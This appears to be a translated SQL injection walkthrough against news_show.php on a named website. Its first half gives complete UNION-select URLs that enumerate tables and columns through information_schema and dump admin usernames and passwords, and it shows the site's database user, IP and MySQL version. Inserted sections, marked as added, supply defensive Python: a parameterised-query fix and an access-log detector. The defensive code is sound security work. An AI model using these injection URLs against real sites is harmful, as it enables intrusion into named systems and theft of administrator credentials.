1.
Detecting the number of columns
http://www.myhack58.com/news_show.php?id=-61order by 24 returns an error, which shows the column count is 24
Viewing database information
http://www.myhack58.com/news_show.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
http://www.myhack58.com/news_show.php?id=-61+union+select+1,user(),3,4,database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
user()----------------osywine@115.160.154.39
version()--------5.0.91-log (the MySQL version)
Every version from 5.0 upward ships with a virtual database named information_schema, which stores the metadata of all databases.
database()-------osywine
2.
Using the virtual database information_schema to dump table names
http://www.myhack58.com/news_show.php?id=-61+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.tables+where+table_schema=0x6F737977696E65+limit+1,1
0x6F737977696E65 is osywine in hexadecimal (0x6F737977696E6520)
Then change the limit clause (limit+0,1, limit+1,1, and so on) to query the next table
This exposes the admin table
3.
Using the table name to dump its columns
http://www.myhack58.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E
Exposes id
http://www.myhack58.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+1,1
Exposes username
http://www.myhack58.com/news_show.php?id=-61+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E+limit+2,1
Exposes password
http://www.myhack58.com/news_show.php?id=-61+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin
Dumps the usernames and passwords directly
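The three steps above all depend on one defect: news_show.php splices the id parameter straight into the SQL text, so "-61 union select ..." becomes part of the statement. The following is an added example, not code from the original page or from the site it describes, that reproduces that defect against a constructed in-memory SQLite table (the real schema behind news_show.php is not shown on the page, so the news table here is hypothetical) and places the two mitigations a defender would apply beside it: binding the value as a driver parameter, and validating that it is an integer before it reaches the query at all.

```python
import re
import sqlite3

# Constructed stand-in for the table behind news_show.php (hypothetical schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(61, "Site announcement"), (62, "Second article")])
    conn.commit()
    return conn

def news_show_vulnerable(conn, id_param: str):
    """The flaw the walkthrough exploits: the parameter is concatenated into the
    SQL text, so a UNION appended to the id is executed as part of the query."""
    sql = "SELECT id, title FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()

def news_show_bound(conn, id_param: str):
    """First mitigation: the value is passed as a bound parameter. Whatever the
    client sends is compared as a single literal; it can never extend the query."""
    return conn.execute("SELECT id, title FROM news WHERE id=?", (id_param,)).fetchall()

INT_RE = re.compile(r"\d{1,10}")

def news_show_safe(conn, id_param: str):
    """Second mitigation on top of binding: reject anything that is not a plain
    positive integer before it touches the database. Raises ValueError otherwise."""
    if not INT_RE.fullmatch(id_param.strip()):
        raise ValueError("id must be a positive integer")
    news_id = int(id_param)
    return conn.execute("SELECT id, title FROM news WHERE id=?", (news_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # Constructed payload in the shape the page uses (negative id plus UNION).
    payload = "-61 union select 1,'injected'"
    print("vulnerable:", news_show_vulnerable(db, payload))   # attacker-chosen row
    print("bound     :", news_show_bound(db, payload))        # no row matches
    try:
        news_show_safe(db, payload)
    except ValueError as exc:
        print("validated :", exc)
```

The bound version alone already defeats the UNION because the whole string is compared against the id column as one value; the validating version is still worth having, since it also turns the malformed requests that the walkthrough's first step produces (order by 24 probing) into a clean 400-style rejection that is easy to log and alert on.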
**********************************************************************************
Second method (more convenient and faster)
Dump all table names at once
http://www.myhack58.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_schema=0x6F737977696E65
0x6F737977696E65 is osywine in hexadecimal
All the tables are as follows:
aboutweb,admin,blog,ggao,liuyan,member,news,news_class,news_class2,photo,photo_class,products,products_class,products_class2,settle_accounts,shoping,youqinglj
Dump all column names at once
http://www.myhack58.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646D696E
0x61646D696E is admin in hexadecimal
All the columns are as follows:
id,username,password
Then comes the final step... the usernames and passwords are dumped directly...
http://www.myhack58.com/news_show.php?id=-61+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+username,0x5f,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admin
Note: every + in these URLs stands in for a space; /**/ can be used instead. Different situations call for different analysis!
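Every request in both methods leaves a recognisable trace in the web server's access log: an order by N probe, union select, references to information_schema.tables or information_schema.columns, GROUP_CONCAT, and hex literals standing in for the schema and table names. The following is an added example, not part of the original page, of a detector that runs over constructed access-log lines (the sample lines below are made up for the example; only their query-string shapes follow the page). It first normalises the query string the way the note above describes, decoding %xx, treating + as a space and replacing /**/ with a space, then matches the indicators and decodes any 0x literal so an analyst can see which schema or table the request was aimed at.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original page).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /news_show.php?id=61 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /news_show.php?id=-61%20order%20by%2024 HTTP/1.1" 500 312',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /news_show.php?id=-61+union+select+1,table_name,3'
    '+from+information_schema.tables+where+table_schema=0x6F737977696E65+limit+1,1 HTTP/1.1" 200 4870',
    '10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /news_show.php?id=-61/**/union/**/select/**/1,2,3,4,'
    'GROUP_CONCAT(DISTINCT/**/column_name),6/**/from/**/information_schema.columns/**/where/**/'
    'table_name=0x61646D696E HTTP/1.1" 200 4901',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_RE = re.compile(r"0x([0-9a-f]{2,})")

# Indicators in the order they are checked; each maps to the page's technique.
INDICATORS = [
    ("column-count probe", re.compile(r"\border by \d+")),
    ("union-based injection", re.compile(r"\bunion (?:all )?select\b")),
    ("schema enumeration", re.compile(r"\binformation_schema\.(?:tables|columns)\b")),
    ("bulk extraction", re.compile(r"\bgroup_concat\(")),
]

def normalize(query: str) -> str:
    """Undo the separator tricks the note describes: %xx decoding, + as space,
    /**/ as space, then collapse whitespace and lowercase for matching."""
    text = unquote_plus(query)
    text = text.replace("/**/", " ")
    return re.sub(r"\s+", " ", text).lower()

def decode_hex_literals(text: str):
    """Turn 0x... literals (used on the page in place of quoted names) back into
    the ASCII strings they encode; non-decodable literals are skipped."""
    names = []
    for hexdigits in HEX_RE.findall(text):
        try:
            names.append(bytes.fromhex(hexdigits).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue
    return names

def analyze_line(line: str):
    """Return hits, decoded hex names and the normalised query for one log line,
    or None if the line carries no request with a query string."""
    match = REQUEST_RE.search(line)
    if not match or "?" not in match.group(1):
        return None
    query = match.group(1).split("?", 1)[1]
    norm = normalize(query)
    hits = [name for name, rx in INDICATORS if rx.search(norm)]
    return {"hits": hits, "hex_names": decode_hex_literals(norm), "normalized": norm}

def scan(lines):
    """Return (line, analysis) pairs for every line that triggered an indicator."""
    flagged = []
    for line in lines:
        result = analyze_line(line)
        if result and result["hits"]:
            flagged.append((line, result))
    return flagged

if __name__ == "__main__":
    for line, result in scan(SAMPLE_LOG):
        print(result["hits"], result["hex_names"])
        print("   ", result["normalized"])
```

Normalising before matching is the part that matters: a rule that only looks for "union select" with a literal space misses the + and /**/ variants the note mentions, and one that only looks at the raw query misses the %20 form. Decoding the hex literals is what tells the responder that the request targeted the osywine schema and the admin table rather than just "some injection".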